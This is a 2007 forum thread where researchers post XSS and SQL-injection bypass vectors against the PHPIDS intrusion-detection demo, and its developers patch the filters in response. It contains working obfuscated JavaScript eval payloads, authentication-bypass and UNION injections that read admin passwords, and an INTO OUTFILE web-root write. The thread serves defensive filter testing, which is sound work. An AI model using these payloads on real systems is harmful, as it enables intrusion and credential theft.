Re: PHPIDS (0.4 was just released)
Posted by: thornmaker
Date: September 17, 2007 06:17PM

@.mario and christian: No worries... I know you guys appreciate the vectors, and I appreciate the recognition. I think it's good that you're staying focused on overall goals of the project. I just wanted to clarify that if at any point you feel like stopping this endless cycle, that's just fine with me.

Re: PHPIDS (0.4 was just released)
Posted by: Gareth Heyes
Date: September 17, 2007 08:30PM

s=function test2() {return 'hrefjavascriptalert(1)a';1,1}();
void(a = {} );
void(c = URL );
a.c=function xyz() {return c[4] }();
a.h1=function xyz() {return s[0] }();
a.h2=function xyz() {return s[1] }();
a.h3=function xyz() {return s[2] }();
a.h4=function xyz() {return s[3] }();
a.u1=function xyz() {return s[4] }();
a.u2=function xyz() {return s[5] }();
a.u3=function xyz() {return s[6] }();
a.u4=function xyz() {return s[7] }();
a.u5=function xyz() {return s[8] }();
a.u6=function xyz() {return s[9] }();
a.u7=function xyz() {return s[10] }();
a.u8=function xyz() {return s[11] }();
a.u9=function xyz() {return s[12] }();
a.u10=function xyz() {return s[13] }();
a.u11=function xyz() {return s[14] }();
a.u12=function xyz() {return s[15] }();
a.u13=function xyz() {return s[16] }();
a.u14=function xyz() {return s[17] }();
a.u15=function xyz() {return s[18] }();
a.u16=function xyz() {return s[19] }();
a.u17=function xyz() {return s[20] }();
a.u18=function xyz() {return s[21] }();
$_=function xyz() {return a.u1 + a.u2 + a.u3 + a.u4 + a.u5 + a.u6 + a.u7 + a.u8 + a.u9 + a.u10 + a.c + a.u11 + a.u12 + a.u13 + a.u14 + a.u15 + a.u16 + a.u17 + a.u18 }();
for(i in x=this) x[a.h1+a.h2+a.h3+a.h4]=$_;

Re: PHPIDS (0.4 was just released)
Posted by: thornmaker
Date: September 17, 2007 09:41PM

A lot of new stuff going on in that one, Gareth... cool!

Re: PHPIDS (0.4 was just released)
Posted by: thornmaker
Date: September 17, 2007 11:06PM

...here's my first one using the XML tags... and also the shortest one I've found in a long time.

http://demo.php-ids.org/?test=%61%3D%3C%72%3E%6C%6F%63%61%3C%76%3E%65%3C%2F%76%3E%74%69%6F%6E%2E%68%61%73%3C%76%3E%76%61%3C%2F%76%3E%68%2E%73%75%62%73%3C%76%3E%6C%3C%2F%76%3E%74%72%28%31%29%3C%2F%72%3E%0A%7B%62%3D%30%65%30%5B%61%2E%76%2E%74%65%78%74%28%29%0A%5D%7D%68%74%74%70%3D%27%27%3B%62%28%62%28%68%74%74%70%2B%61%2E%74%65%78%74%28%29%0A%29%29#alert%28%27XML%20w00t%27%29

a=<r>loca<v>e</v>tion.has<v>va</v>h.subs<v>l</v>tr(1)</r>
{b=0e0[a.v.text()
]}http='';b(b(http+a.text()
))

Re: PHPIDS (0.4 was just released)
Posted by: Gareth Heyes
Date: September 18, 2007 12:08AM

Nice execution workaround :) 0e0

Re: PHPIDS (0.4 was just released)
Posted by: Gareth Heyes
Date: September 18, 2007 12:08AM

s=function test2() {return 'aalert(1)a';1,1}();
void(a = {} );
a.a1=function xyz() {return s[1] }();
a.a2=function xyz() {return s[2] }();
a.a3=function xyz() {return s[3] }();
a.a4=function xyz() {return s[4] }();
a.a5=function xyz() {return s[5] }();
a.a6=function xyz() {return s[6] }();
a.a7=function xyz() {return s[7] }();
a.a8=function xyz() {return s[8] }();
$=function xyz() {return a.a1 + a.a2 + a.a3 +a.a4 +a.a5 + a.a6 + a.a7 +a.a8 }();
new Function($)();

Re: PHPIDS (0.4 was just released)
Posted by: Gareth Heyes
Date: September 18, 2007 01:36AM

Got another small and nice one:-
x = localName.toLowerCase() + 'lert(1),' + 0x00;new Function(x)()

Re: PHPIDS (0.4 was just released)
Posted by: Anonymous User
Date: September 18, 2007 03:53AM

@all: Thanks a lot again. Will take care of those vectors soon!
@Reiners: I am looking forward to the SQLi contest. I see tons of possible injections there.

Meanwhile eat this:

x='\x61\x6c\x65\x72\x74\x28\x31\x29';
new Function(x)()

Based on Gareth's vector, but a little bit simplified and more obfuscated...



Edited 1 time(s). Last edit at 09/18/2007 05:34AM by .mario.

Re: PHPIDS (0.4 was just released)
Posted by: Gareth Heyes
Date: September 18, 2007 03:54AM

Very nice :)

Re: PHPIDS (0.4 was just released)
Posted by: Gareth Heyes
Date: September 18, 2007 05:25AM

Even shorter :)

Function('a\x6cert(1)')();

Re: PHPIDS (0.4 was just released)
Posted by: Reiners
Date: September 18, 2007 07:05AM

.mario Wrote:
-------------------------------------------------------
> @Reiners: I am looking forward to the SQLi
> contest. I see tons of possible injections there.

Hi!
What do you mean by SQLi contest? Maybe I am not up to date ... :)

And there might be a problem with false positives ...
http://demo.php-ids.org/?test=Just%20in%20case%20this%20idea%20is%20not%20Reiners'%20or%20it%20is%20not%20mine
(Bad English, but I'm sure there are some other phrases triggering false positives.)
Maybe you filter only for "or is not null", because that's the only phrase I know which is working with "or is not".



Edited 2 time(s). Last edit at 09/18/2007 11:26AM by Reiners.

Re: PHPIDS (0.4 was just released)
Posted by: Gareth Heyes
Date: September 18, 2007 07:12AM

This unicode attack is cool:-

x=eval,1,1,1;1;
1,1,1,b='\\',1,1,1;
1,1,1,s='\'',1,1,1;
1,1,1,o='0',1,1,1;
x( x(s+b+141+b+154+b+145+b+162+b+164+b+o+50+b+o+61+b+o+51+s) );

It didn't work (score 13), but I thought it might inspire someone.

Re: PHPIDS (0.4 was just released)
Posted by: Anonymous User
Date: September 18, 2007 01:02PM

@Reiners: Right now there definitely is! I added the string to the false DB database. Will take care of that soon! *fixed*



Edited 1 time(s). Last edit at 09/18/2007 01:54PM by .mario.

Re: PHPIDS (0.4 was just released)
Posted by: Anonymous User
Date: September 18, 2007 04:53PM

Where is the script tag? Now try the hard stuff, including a full script tag. ^^

Re: PHPIDS (0.4 was just released)
Posted by: Gareth Heyes
Date: September 19, 2007 03:10AM

I'm just playing by the rules Ronald, I'll always take the easy option to save time. Although I might take up your challenge :)

Re: PHPIDS (0.4 was just released)
Posted by: Anonymous User
Date: September 19, 2007 04:37AM

Yeah, would be cool I guess. I'm sure there is some crazy way for that also?

Re: PHPIDS (0.4 was just released)
Posted by: Gareth Heyes
Date: September 19, 2007 04:43AM

In Opera :D

<body background=javascript&#58%20%20%20%20%20alert(1)

I haven't got IE to test.

Re: PHPIDS (0.4 was just released)
Posted by: Gareth Heyes
Date: September 19, 2007 05:05AM

They've fixed it already :)

Damn, they're fast.

Re: PHPIDS (0.4 was just released)
Posted by: Anonymous User
Date: September 19, 2007 07:18AM

Woohoo! Cool stuff. I really thought they would block most starting HTML tags?

Re: PHPIDS (0.4 was just released)
Posted by: Spyware
Date: September 19, 2007 12:35PM

http://demo.php-ids.org/?test=I%20fixed%20the%20window%20(in%20my%20car)%20all%20by%20myself!

Should this trigger the protection?

Hm, fixed already?

http://demo.php-ids.org/?test=I%20fixed%20the%20window%20(in%20my%20car)%20all%20by%20myself(again)

Triggers protection too. Once again: should it do this?



Edited 2 time(s). Last edit at 09/19/2007 12:55PM by Spyware.

Re: PHPIDS (0.4 was just released)
Posted by: Gareth Heyes
Date: September 19, 2007 07:14PM

&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3a&#x61&#x6c&#x65&#x72&#x74&#x28&#x31&#x29

Re: PHPIDS (0.4 was just released)
Posted by: Gareth Heyes
Date: September 20, 2007 05:31AM

s=new String;
e = /aeavaala/+s;
e = new String + e[ 2 ] + e[ 4 ] + e[ 5 ] + e[ 7 ];
a = /aablaecrdt(1)a/+s;
a = new String + a[ 2 ] + a[ 4 ] + a[ 6 ] + a[ 8 ] + a[ 10 ] + a[ 11 ] + a[ 12 ] + a[ 13 ],
e=new Date() [e];
e(a)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: PHPIDS (0.4 was just released)
Posted by: Reiners
Date: September 20, 2007 10:26AM

http://demo.php-ids.org/?test=a'%20or%201='1
--> ?test=a' or 1='1

http://demo.php-ids.org/?test=asd'%20union%20(select%20username,password%20from%20admins)%20where%20id='1
--> ?test=asd' union (select username,password from admins) where id='1
Edit: on MySQL this can only be used if the main query is in brackets () too,
like "(SELECT ...) UNION (SELECT ...)".
But I guess it works on other DBMSs; can somebody confirm that?

Also note that the following chars can be used between "select[]username,password" on MySQL:
"+", "-", "!", "@", "~" (and of course all whitespace).
This does not work between "union select", so right now the PHP-IDS filters are fine with that ;) Anyway, quite interesting for bypassing other filters imho.

False positive?! ;)
http://demo.php-ids.org/?test=this%20annoys%20mario%20(its%20name%20is%20%22false%20positive%22)%20



Edited 2 time(s). Last edit at 09/20/2007 10:55AM by Reiners.

Re: PHPIDS (0.4 was just released)
Posted by: Anonymous User
Date: September 20, 2007 02:40PM

Hi!

Phew - those were some head nuts and it took me a while to solve them. The result: four over-sized rules gone, several drastically optimized with conditional regex, many false alerts removed, and the whole thing with even smaller rules - 24148 bytes in the 0.4.0 release and now 23998 in the trunk ;)

Thanks a lot guys!

@Reiners: SQL Injection contest is coming in around '1 OR '2 weeks

Greetings,
.mario

Re: PHPIDS (0.4 was just released)
Posted by: tx
Date: September 20, 2007 03:53PM

potential authentication bypass: http://demo.php-ids.org/?test=admin%20'%20having%201%20%231%20%21

I'm not positive that
declare ,@a varchar;
is valid syntax, so it may be a moot point (anyone got an answer for that? I can't test at the moment),
but here's another: http://demo.php-ids.org/?test=%3Bdeclare%20%2C@a%20varchar%3Bbegin%20select%20@a%20%3D%20password%20from%20%27users%27%20limit%201%3B%20%20select%20@a%20as%20a%20into%20tbl_a%3B%20%20end%3B%20%231%20%21

EDIT: this false positive is dedicated to Michael Jordan: http://demo.php-ids.org/?test=I%27m%20watchin%27%20%2323%20from%20the%20bulls%20dunk%20on%20everybody%21

-tx @ lowtech-labs.org



Edited 2 time(s). Last edit at 09/20/2007 04:04PM by tx.

Re: PHPIDS (0.4 was just released)
Posted by: Anonymous User
Date: September 20, 2007 04:06PM

Nice ones - the
declare ,@
really works? *fixxed*

Thx!
.mario

Re: PHPIDS (0.4 was just released)
Posted by: tx
Date: September 20, 2007 04:41PM

Damn, you're fast! :)

Here's another: http://demo.php-ids.org/?test=%27%20or%20id%3D1%20having%201%20%231%20%21

EDIT: and another http://demo.php-ids.org/?test=%27%20or%20username%20REGEXP%20%27admi*%27%20having%201%20%231%20%21

EDIT2: Only works for non multi-byte character sets, but still passes the smoketest: http://demo.php-ids.org/?test=%27%20or%20username%20SOUNDS%20LIKE%20%27adnin%27%20and%201%20sounds%20like%201%20%231%20%21

-tx @ lowtech-labs.org



Edited 4 time(s). Last edit at 09/21/2007 12:04AM by tx.

Re: PHPIDS (0.4 was just released)
Posted by: Reiners
Date: September 20, 2007 05:50PM

Hi! SQLi contest sounds fun, is there more information available yet?

Again I played with the "or" operator. Here are some examples which all work on MySQL in a query with quotes:

//prefix
http://demo.php-ids.org/?test=asd'or-1='-1
--> ?test=asd'or-1='-1
--> ?test=asd'or!1='!1
--> ?test=asd'or!(1)='1
--> ?test=asd'or@1='@1
--> ?test=asd'or-1 XOR'0
...

//functions
http://demo.php-ids.org/?test=asd'%20or%20ascii(1)='49
--> ?test=asd' or ascii(1)='49
--> ?test=asd' or md5(1)^'1
...

//columns
http://demo.php-ids.org/?test=asd'%20or%20table.column^'1
--> ?test=asd' or table.column^'1

//system variables
http://demo.php-ids.org/?test=asd'%20or%20@@version^'0
--> ?test=asd' or @@version^'0
--> ?test=asd' or @@global.hot_cache.key_buffer_size^'1
...

//subquery
http://demo.php-ids.org/?test=asd'%20or!(select%20name%20from%20users%20limit%201)='1
--> ?test=asd' or!(select name from users limit 1)='1
("limit 1" to return only one row, "!(string)" always returns "1")

also works (they all return true somehow):
http://demo.php-ids.org/?test=1'OR!'a
--> ?test=1'OR!'a
--> ?test=1'OR!'0
--> ?test=1'OR-'1
--> ?test=1'OR@'1' IS NULL #1 ! (with unfiltered comment by tx ;)
--> ?test=1'OR!(false) #1 !
--> ?test=1'OR-(true) #a !

//other
http://demo.php-ids.org/?test=1'%20INTO%20OUTFILE%20'C:/webserver/www/readme.php
--> ?test=1' INTO OUTFILE 'C:/webserver/www/readme.php
(useful on blind sql injections in combination with a "or statement" from above)

Enough spammed ;) I hope some are useful.
Greetings, Reiners



Edited 10 time(s). Last edit at 09/20/2007 08:02PM by Reiners.

Re: PHPIDS (0.4 was just released)
Posted by: Anonymous User
Date: September 21, 2007 03:24AM

Hi - very cool ones. I am totally swamped in work right now so I will take care of them tomorrow. Thx guys!

<edit>I couldn't wait... all fixx0red :)</edit>



Edited 1 time(s). Last edit at 09/21/2007 11:30AM by .mario.

Re: PHPIDS (0.4 was just released)
Posted by: tx
Date: September 21, 2007 02:52PM

@mario: These three four auth bypasses are still getting through:

using id instead of username: http://demo.php-ids.org/?test=%27%20or%20id%3D1%20having%201%20%231%20%21
?test=' or id=1 having 1 #1 !
REGEXP matching admin name: http://demo.php-ids.org/?test=%27%20or%20username%20REGEXP%20%27admi*%27%20having%201%20%231%20%21
?test=' or username REGEXP 'admi*' having 1 #1 !
SOUNDS LIKE : http://demo.php-ids.org/?test=%27%20or%20username%20SOUNDS%20LIKE%20%27adnin%27%20and%201%20sounds%20like%201%20%231%20%21
?test=' or username SOUNDS LIKE 'adnin' and 1 SOUNDS LIKE 1 #1 !

The comment rule (?:"\s*(?:#|--|{))|(?:\/\*!\s?\d+)|(?:ch(?:a)?r\s*\(\s*\d) catches
?test=' #1 !
but can be evaded with
?test=' {some expression or text here} #{some alphanum} !

EDIT:
Another auth bypass using hex: http://demo.php-ids.org/?test=%27%20or%20username%3D0x61646D696E%3B%20%23a%20%21
?test=' or username=0x61646D696E; #a !

I've got some more for you as soon as I'm not under deadline anymore :\

-tx @ lowtech-labs.org



Edited 4 time(s). Last edit at 09/21/2007 04:09PM by tx.
